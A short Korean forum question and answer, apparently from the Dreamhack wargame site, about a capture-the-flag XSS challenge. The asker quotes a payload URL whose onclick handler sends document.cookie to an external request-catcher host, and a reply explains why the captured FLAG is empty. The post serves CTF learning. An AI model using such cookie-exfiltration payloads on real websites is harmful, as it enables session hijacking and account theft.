완료됨
외부 웹으로 쿠키 탈취법
코드를
http://host2.dreamhack.games:21402/vuln?param=<div onclick=location.href="https://qiwzdfr.request.dreamhack.games/?memo=" + document.cookie;>클릭</div>
이렇게 작성해서 외부 웹으로 정보가 도착한 것도 확인했는데
FLAG 값만 여백으로 남아있습니다.
왜 그런 것인가요?
#웹해킹
#문제풀이
답변
1
집오리너구리
강의 수강: 10
클릭 이벤트에 자바스크립트 코드가 실행된다는 것은 우리(접속한 드림핵 유저)가 클릭했다는 것 같습니다. 그렇다는 것은 우리의 쿠키값이 넘어가므로 FLAG값이 없다고 보여집니다.